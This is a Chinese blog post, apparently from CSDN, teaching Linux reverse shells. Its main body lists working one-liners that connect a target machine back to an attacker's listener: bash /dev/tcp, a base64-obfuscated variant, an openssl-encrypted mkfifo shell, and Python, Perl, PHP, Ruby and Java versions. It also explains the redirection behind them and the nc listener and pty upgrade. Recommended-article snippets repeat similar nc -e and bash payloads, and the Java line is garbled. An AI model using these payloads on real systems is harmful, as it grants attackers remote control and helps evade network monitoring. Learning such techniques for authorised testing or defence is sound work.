Linux反弹shell学习

最新推荐文章于 2024-06-01 11:15:00 发布
最新推荐文章于 2024-06-01 11:15:00 发布
阅读量1.5k 收藏 3
点赞数 2
分类专栏: Web安全学习篇 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/120132246
版权

前言

当我们可以在远程Linux主机上执行任意命令或写入任意的数据到任意的文件的时候
通常会通过反弹一个shell 来控制远程主机

bash 反弹shell

Linux反弹shell使用这条命令,但反弹回来的shell是不可交互的
bash -i >& /dev/tcp/10.10.10.134/2333 0>&1
也可以{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjI3LzQ0NDQgMD4mMSA=}|{base64,-d}|{bash,-i}

客户端用netcat 进行接收
nc -lvvp 2333 监听2333端口
在这里插入图片描述

使用什么样的用户反弹的shell,就是当前用户的权限(只有拥有/bin/bash 的用户才能够使用该命令)

命令原理

首先 bash -i 是打开一个交互式的bash终端
/dev/tcp/ 是linux的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。

那么>&0>&1 又是什么意思呢?

首先我们了解一下Linux文件描述符和重定向。
linux shell下常用的文件描述符是:
标准输入 (stdin) :代码为 0 ,使用 < 或 <<
标准输出 (stdout):代码为 1 ,使用 > 或 >>
标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>

然后发现 >&&> 两者一个意思,都是将标准错误输出合并到标准输出中。

如果我们执行一个命令,比如 ls -lh > test ,这样的话,test文件中只会保存我们执行这个命令正常的输出结果
而如果我们执行命令 ls -lh >& test 或者 ls -lh &> test ,这样的话,test文件中既会保存我们执行这个命令正常的结果,也会保存我们执行这个命令出错了的结果。

所以,当我们执行命令:bash -i >& /dev/tcp/10.10.10.134/2333 时,他会与10.10.10.134/2333号端口建立一个socket连接,把bash的标准输出和标准错误输出发给10.10.10.134/2333。也就是获得了他的shell,但是10.10.10.134却不能进行操作。

同理0>&10<&1 也是一个意思,都是将标准输入重定向到标准输出中。所以加入 0>&1 的话,就可以接受用户的输入了。

所以,结合上面的:bash -i >& /dev/tcp/10.10.10.134/2333 0>&1 命令是意思是:与10.10.10.134/2333端口建立一个socket连接,把bash的标准输出和标准错误输出发给10.10.10.134/2333。并且可以接受输入,也就是可以进行交互式操作

但是更多时候获得的shell并不是一个具有完整的交互shell

如果目标的主机有python环境,我们在获得反弹shell后,可以执行这个命令得到一个正常可交互的shell
python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述

加密bash反弹shell

在攻击机上生成SSL证书的公钥私钥对,一路回车
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
在这里插入图片描述

然后用openssl监听反弹shell
openssl s_server -quiet -key key.pem -cert cert.pem -port 2333

目标机用openssl加密反弹shell的流量
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.10.136:4444 > /tmp/s;rm /tmp/s
在这里插入图片描述

其他反弹shell

同样是只有拥有/bin/bash的用户才能使用,使用什么样的用户反弹什么权限

Python
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.10.25”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);’

Perl
perl -e ‘use Socket;$i=“192.168.10.13”;$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’

PHP
php -r ‘$sock=fsockopen(“192.168.10.13”,8888);exec("/bin/sh -i <&3>&3 2>&3");’

Ruby
ruby -rsocket -e’f=TCPSocket.open(“192.168.10.13”,8888).to_i;exec sprintf("/bin/sh -i <&%d>&%d 2>&%d",f,f,f)’

Java
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c",“exec 5<>/dev/tcp/192.168.10.13/8888;cat <&5 2=”" |="" while="" read="" line;="" do="" $line="">&5 >&5; done"] as String[]) p.waitFor()

paidx0
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Linux反弹shell
weixin_64338385的博客
11-26 2273
0x01. bash 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口 在目标主机上执行: bash -i >& /dev/tcp/攻击主机i...
linux学习 认知shell
Charlson_S的博客
12-28 360
shell相当于经过装饰的命令行,和命令行一样,都能操作linux。但是shell是面向过程的,相当于有了一定的逻辑和过程,而命令行只是单一的操作 问题一:shell命令行跟linux命令的区别 问题二:什么叫做shell脚本,脚本是什么 问题三:什么是解释器?编译器,编辑器 shell 有的编程语言,如 C/C++、Go语言、汇编等,必须在程序运行之前将所有代码都翻译成二进制形式,也就是生成可执行文件,用户拿到的是最终生成的可执行文件,看不到源码。这个过程叫做编译(Compile),这样的编程语言叫做编译
【讨论】反弹shell命令里的0>&1到底是个什么玩意?
DumplingY的博客
03-13 936
关于反弹shell命令的思考(重定向你杀了我吧)
shell启动脚本中的0、1、2、>和&解析
热门推荐
l1394049664的博客
08-15 1万+
目录 一、0 1 2 文件描述符 二、&gt;是重定向符,就是把前面输出的内容重定向到后面指定的位置 三、&amp; 是一个描述符,如果1或2前不加&amp;,会被当成一个普通文件 nohup sh gmv.sh &gt;ls.txt 2&gt;&amp;1 &amp;  后台运行脚本的一般格式,并且把日志(正常日志和错误日志)输出到ls.txt中 tail -f ls.txt可以动态查...
【安全知识】——LInuxshell反弹姿势合集(更新中)
最新发布
A_991128a的博客
06-01 686
*作者名:白昼安全主页面链接:座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日鸡汤: **当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。下面给大家列举一些平时用的比较多的这里的演示环境为。
谈谈常用Reverse shell,以及他们是怎么做到的。
TA不懒,但还没有添加简介
05-02 883
谈谈常用Reverse shell,以及他们是怎么做到的。
Linux渗透之反弹Shell命令解析
deeplearnings的博客
08-18 9859
前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 B
Unix中 &0 &1 &2 $# 啥意思
liujinwei2005的专栏
02-20 3994
经常关注linux脚本的人,一定看到过 2>&1 这样的用法,最初一定不明白其中的含义以及为什么是这样的一种组合。昨天偶然间再次看到了这个 2>&1 的写法,遂下决心搞明白其中的含义。     其实要弄清楚 2>&1 的含义,首先应当知道linux中有三种标准输入输出,分别是STDIN,STDOUT,STDERR,对应的数字是0,1,2。STDIN就是标准输入,默认从键盘读取信息;STDOUT是
linux反弹shell的原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
【不一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识,作者从独特的角度出发,挑战了传统的分类方法,为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术,它涉及被控端...
Linux下NC反弹shell命令(推荐)
09-15
本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作,并提供其他编程语言的反弹Shell命令作为参考。 首先,攻击者需要在自己的机器上启动一个监听服务来接收目标机器的连接。这通常通过以下`nc`命令完成: ...
浅析Linux之bash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
linux 反弹脚本,linux反弹shell的原理详解
weixin_36219012的博客
04-30 289
完整命令反弹shell命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1bash -i > /dev/tcp/ip/port 0>&1 2>&1利用nc反弹shell:nc -lvvp 12345 -t -e /bin/bash原理bash -i > /dev/tcp/ip/port 0>&a...
exec 1>&0
luooofan的博客
02-02 3184
最近在做hgame2020-pwn的一道题中,官方wp给出了一条linux命令是exec 1>&0,不解其意,直接查找也找不到这条命令到底是干什么的,拐弯抹角地先了解了文件描述符,然后才了解了这条命令。 程序的原意是输入一个字符串s1,经过字符检查后执行如下三条语句: close(1);close(2);system(&s1); 我们的目的是要得到shell,官方wp给...
linux反弹shell
mingyqf的博客
02-17 1109
使用nc对本地端口监听 nc -lvnp 8888 1.bash反弹 bash -i >& /dev/tcp/ip_address/port 0>&1 bash -c "bash -i >& /dev/tcp/192.168.0.189/6666 0>&1" 2.nc反弹 nc -e /bin/sh 192.168.2.130 4444 但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决 rm /tmp/f;mkfifo /tmp/
命令执行漏洞
qq_42307546的博客
01-20 1477
命令执行漏洞也称为rce,当应用调用一些外部程序就会用到一些系统命令的函数,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,就会造成命令执行漏洞 相关函数 system(args)有回显 passthru(args)有c exec(args)回显最后一行-必须echo输出 shell_exec()无回显必须输出 代码分析 <?php /** * Created by runner.han * There is nothing new under the sun */
java Runtime.getRuntime().exec 获取反弹shell
whatday的专栏
07-03 6090
说明 前面写了一篇在Java环境下获取shell的文章。当时使用的语句是: 1 2 3 Runtime r = Runtime.getRuntime(); Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"}); p
2>&1
gyflyx的专栏
01-07 927
ls -l > out.file 2>&1 & 解释: ls -l > out.file //将ls的输出重定向到文件out.file 2>&1 //在shell中,文件描述符通常是:STDIN,STDOUT,STDERR,即:0,1,2,由此可以看出,它将ls -l > out.file在输出过程中产生的错误信息也放在了STDOUT,即:1中,你可以作实验,如果命令产生了错误,那么错误信息
反弹shell
h3110n3w0r1d
04-05 346
反弹shell语句 bash -i >& /dev/tcp/ip/port 0>&1 这句的意思是 首先将标准输出重定向/dev/tcp/ip/port也就是远程 然后再把标准输入重定向远程。 然后就可以在远程输入输出了 其中ip必须为公网Ip bash -i 在本地产生一个交互的bash环境 >&的含义 当>&后面接文...
linux反弹shell检测
08-22
Linux 反弹 shell 是一种攻击技术,攻击者利用漏洞或恶意代码将远程 shell 注入受害者的系统,从而获取对系统的控制权。为了检测 Linux 反弹 shell,可以采取以下几种方法: 1. 监控网络活动:使用网络监控工具,如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值